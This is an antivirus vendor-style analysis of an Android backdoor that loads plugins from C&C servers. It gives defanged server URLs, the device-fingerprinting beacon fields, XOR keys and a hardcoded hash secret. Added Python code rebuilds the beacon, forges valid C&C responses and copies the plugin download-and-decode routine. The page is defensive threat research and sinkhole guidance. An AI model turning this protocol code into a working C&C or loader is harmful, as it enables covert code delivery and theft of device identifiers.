Android.Backdoor.854.origin

Added to the Dr.Web virus database: 2022-07-22

Description added:

  • SHA1: c747a3a901f3076c504dc513bfcf64e8d29600ac (PrivteProvide.jar)

Description

Android.Backdoor.854.origin is a trojan application for Android devices. It is a .DEX file packed into a .JAR archive (PrivteProvide.jar). The archive is copied into the directories of targeted apps by other trojans, in particular Android.BackDoor.3104. The main function of Android.Backdoor.854.origin is to download and launch additional malicious modules (plugins) in the context of those targeted programs.

Operating routine

The com.androidx.v13.PrivteProvide.getInstance(String) entry point is used to start the trojan. When launched, at short time intervals it tries to obtain an instance of the android.app.Application class until it succeeds.

Android.Backdoor.854.origin creates the following subdirectories in the directories containing the files of the targeted apps:

  • .cache/pt—encrypted plugin files are downloaded into this directory;
  • .cache/pn—decrypted plugins are saved into this directory;
  • .cache/pd—in this directory, the optimized versions of plugins are saved. They are created by the operating system after the original versions are loaded through the DexClassLoader class.

Next, the trojan launches any plugins already present in the pn directory. New plugins are obtained by connecting to one of the C&C servers.

The connection with the C&C server

Android.Backdoor.854.origin sends requests to the C&C servers from its embedded list, trying them in order starting with the first one. If it cannot establish a connection with the current server within 24 hours, it moves on to the next one. The time of the last successful connection is stored in the successTime variable of the sp_brois_settings configuration file.

The list of C&C server URLs is as follows:

  • hxxp[:]//api[.]genetence[.]com:8300/pl2
  • hxxp[:]//api[.]matriature[.]com:8300/pl2
  • hxxp[:]//api[.]miretic[.]com:8300/pl2
  • hxxp[:]//api[.]sensfaction[.]com:8300/pl2
  • hxxp[:]//45[.]33.61[.]62:8300/pl2

The first request is sent 2 minutes after the thread starts; it is then repeated indefinitely at 60-minute intervals. The first URL in the list is used first; if no connection to it succeeds within 24 hours, the trojan switches to the next URL.

The following parameters are used in the request:

Request parameter   Description
a_l                 Android SDK version
a_i                 android_id, the unique device ID
a_v                 Application version name
a_c                 Application version code
model               Device model
brand               Device brand
ver                 The string "v3"
pack                Package name
imsi                IMSI
imei                IMEI
res                 Screen resolution
sys                 Whether the target application is a system app (1 if yes, 0 if no)
fr                  A string sent when the trojan starts
ctm                 Current time
pft                 Time elapsed since the trojan module started
sn                  md5 hash of the concatenation a_l + a_i + a_v + a_c + "oignuowwg" + ctm

Data sent to and received from the C&C server is XOR-encoded. The key is written as 0x24D3, but the result is cast to byte, so only the low byte of the key survives: every byte is effectively XORed with 0xD3, and the same routine both encodes and decodes.


public static byte[] xor(byte[] data) {
    int i;
    // (byte)(x ^ 0x24D3) == (byte)(x ^ 0xD3): the upper byte of the key is discarded by the cast
    for(i = 0; i < data.length; ++i) {
       data[i] = (byte)(data[i] ^ 0x24D3);
    }
    return data; // encoded in place
}

If the server returns status code 200, the response must contain JSON carrying a particular hash before the trojan executes the command to download and launch plugins:


JSONObject json = new JSONObject(response_body); // response_body: the XOR-decoded HTTP body
String s = json.getString("s");
// The command is honoured only if "s" equals md5(u + "&zhanghui18888"), a static secret
if(Hash.md5(json.getString("u") + "&zhanghui18888").equals(s)) {
    .... //do work: download and launch the plugins listed in the JSON
}

The JSON that the C&C server sends back contains a plugin array where for each plugin the plugin_file, plugin_url, and plugin_size fields are indicated.
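The beacon and its validation, as an added example in Python that is not the trojan's code or Dr.Web's: it builds the request parameters with the sn hash, applies the transport XOR (with the low-byte effect of the Java cast made explicit), produces the server-side JSON with a correct "s" hash, and shows how the client accepts or rejects a response. The URL-encoded form body and the "plugin" key name for the plugin array are assumptions; the page names neither.

```python
import hashlib
import json
from urllib.parse import urlencode

# Constants quoted on this page.
SN_SALT = "oignuowwg"             # appended before md5 over a_l + a_i + a_v + a_c + ctm
RESPONSE_SALT = "&zhanghui18888"  # appended to the "u" field before md5, compared with "s"
TRANSPORT_KEY = 0x24D3            # key as written in the trojan's xor(); see transport_xor()


def transport_xor(data: bytes) -> bytes:
    """Request/response XOR. Java evaluates (byte)(data[i] ^ 0x24D3) and the cast keeps
    only the low byte, so the effective key is 0xD3. XOR is its own inverse, so the same
    function encodes and decodes."""
    key = TRANSPORT_KEY & 0xFF
    return bytes(b ^ key for b in data)


def beacon_params(a_l: str, a_i: str, a_v: str, a_c: str, ctm: str, **extra: str) -> dict:
    """Build the request parameter set. sn ties the identifying fields to the timestamp,
    so a replayed beacon with a fresh ctm fails the server's check unless sn is recomputed."""
    sn = hashlib.md5((a_l + a_i + a_v + a_c + SN_SALT + ctm).encode()).hexdigest()
    params = {"a_l": a_l, "a_i": a_i, "a_v": a_v, "a_c": a_c, "ctm": ctm}
    params.update(extra)  # model, brand, ver, pack, imsi, imei, res, sys, fr, pft ...
    params["sn"] = sn
    return params


def encode_beacon(params: dict) -> bytes:
    """Assumption: the page does not state the wire encoding; a URL-encoded body is used here."""
    return transport_xor(urlencode(params).encode())


def build_response(u: str, plugins: list) -> bytes:
    """Server side of the exchange: JSON with "u", the "s" hash over u + salt, and the plugin
    array. The key name "plugin" is an assumption; the page only says the JSON contains a
    plugin array with plugin_file, plugin_url and plugin_size per entry."""
    s = hashlib.md5((u + RESPONSE_SALT).encode()).hexdigest()
    return transport_xor(json.dumps({"u": u, "s": s, "plugin": plugins}).encode())


def parse_response(status: int, body: bytes):
    """Client side. 206 => record success, no download. 200 => decode, check "s", return
    the plugin list. Any other status, malformed JSON or a bad hash is ignored."""
    if status == 206:
        return "ack", None
    if status != 200:
        return None, None
    try:
        j = json.loads(transport_xor(body).decode())
        expected = hashlib.md5((j["u"] + RESPONSE_SALT).encode()).hexdigest()
    except (ValueError, KeyError, TypeError):
        return None, None
    if expected != j.get("s"):
        return None, None
    return "download", j.get("plugin", [])
```

Because the response check is a static secret rather than a signature, anyone who has extracted the string from the sample can forge a valid 200 response, which is what makes a sinkhole or an emulated C&C for this family straightforward to build.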

After parsing these parameters, the trojan deletes from the .cache/pn directory any preexisting plugins that are not listed in the command. Then the plugins listed in the command that are not yet present on the device are downloaded into the .cache/pt directory. The downloaded plugin files are XOR-encoded with the single-byte key 0xB9:


private static byte[] xor(byte[] data) {
    byte[] out = new byte[data.length];
    int i;
    // Single-byte key; unlike the transport routine this one writes to a new buffer
    for(i = 0; i < data.length; ++i) {
        out[i] = (byte)(data[i] ^ 0xB9);
    }
    return out;
}

The trojan decodes them with the same XOR and writes the results into the .cache/pn directory.

After that, all plugins present in the .cache/pn directory are loaded into memory through DexClassLoader (which leaves optimized copies in .cache/pd) and run in the context of the attacked applications. Depending on their functionality, such plugins can perform a variety of malicious actions.
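The plugin bookkeeping across .cache/pt and .cache/pn, as an added Python example that is not code from the page or from the trojan: it removes plugins absent from the command, fetches and decodes the missing ones, and writes both copies the way the description says. The fetch callback, the temporary directory and the plugin bytes are constructed for the demo; using plugin_size as a sanity check on the downloaded length is an assumption, since the page does not say what the field is used for. Loading through DexClassLoader has no Python equivalent and is left out.

```python
import tempfile
from pathlib import Path

PLUGIN_KEY = 0xB9


def plugin_xor(data: bytes) -> bytes:
    # Same single-byte XOR the trojan applies to files in .cache/pt; XOR is its own inverse.
    return bytes(b ^ PLUGIN_KEY for b in data)


def sync_plugins(app_dir: Path, command: list, fetch) -> dict:
    """Reproduce the trojan's plugin bookkeeping.
    command: the plugin array from the C&C, entries with plugin_file/plugin_url/plugin_size.
    fetch(url): returns the encoded bytes (stubbed in the demo so nothing touches the network).
    Returns which plugins were removed, downloaded and skipped."""
    pt = app_dir / ".cache" / "pt"  # encoded downloads
    pn = app_dir / ".cache" / "pn"  # decoded plugins, what actually gets loaded
    pt.mkdir(parents=True, exist_ok=True)
    pn.mkdir(parents=True, exist_ok=True)

    wanted = {p["plugin_file"] for p in command}
    removed = []
    for f in pn.iterdir():               # step 1: drop plugins the command no longer lists
        if f.name not in wanted:
            f.unlink()
            removed.append(f.name)

    downloaded, skipped = [], []
    for p in command:                    # step 2: fetch only what is not already present
        name = p["plugin_file"]
        if (pn / name).exists():
            skipped.append(name)
            continue
        enc = fetch(p["plugin_url"])
        if len(enc) != p["plugin_size"]:  # assumption: treat plugin_size as a length check
            continue
        (pt / name).write_bytes(enc)             # step 3: keep the encoded copy in pt
        (pn / name).write_bytes(plugin_xor(enc))  # and the decoded copy in pn
        downloaded.append(name)
    return {"removed": removed, "downloaded": downloaded, "skipped": skipped}


def demo() -> dict:
    """Run sync_plugins against a temporary app directory populated with constructed data."""
    with tempfile.TemporaryDirectory() as d:
        app = Path(d)
        pn = app / ".cache" / "pn"
        pn.mkdir(parents=True)
        (pn / "old.jar").write_bytes(b"stale plugin")    # not in the command: must go
        (pn / "keep.jar").write_bytes(b"already here")   # in the command: must not be refetched
        plain = b"PK\x03\x04 constructed plugin payload"
        enc = plugin_xor(plain)
        fake_cdn = {"hxxp://example.invalid/new.jar": enc}  # stands in for plugin_url downloads
        command = [
            {"plugin_file": "keep.jar", "plugin_url": "hxxp://example.invalid/keep.jar", "plugin_size": 12},
            {"plugin_file": "new.jar", "plugin_url": "hxxp://example.invalid/new.jar", "plugin_size": len(enc)},
        ]
        result = sync_plugins(app, command, fake_cdn.__getitem__)
        result["new_plaintext"] = (pn / "new.jar").read_bytes()
        result["pn_listing"] = sorted(f.name for f in pn.iterdir())
        return result


if __name__ == "__main__":
    print(demo())
```

For triage, the same two directories are the place to look on a device: .cache/pt holds the files as downloaded, and XORing each byte with 0xB9 yields the loadable .jar/.dex that sits beside it in .cache/pn.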

If the C&C server returns status code 206, Android.Backdoor.854.origin writes "successFlag" = 1 and "successTime" = System.currentTimeMillis() to the sp_brois_settings configuration file, marking the request as successful; it does the same on code 200. On code 206, however, no plugins are downloaded.

Indicators of compromise


Treatment recommendations


Android

  1. If the mobile device is operating normally, download and install the free Dr.Web for Android Light anti-virus product on it. Run a full system scan and follow the recommendations for neutralizing the detected threats.
  2. If the mobile device has been locked by a ransomware trojan of the Android.Locker family (the screen shows an accusation of breaking the law, a demand to pay a sum of money, or another message that prevents normal use of the device), do the following:
    • boot your smartphone or tablet into safe mode (depending on the operating system version and the particular device, this can be done in different ways; consult the manual supplied with the device or contact its manufacturer);
    • once safe mode is active, install the free Dr.Web for Android Light anti-virus product on the infected device and run a full system scan, following the recommendations for neutralizing the detected threats;
    • switch the device off and turn it on again in normal mode.
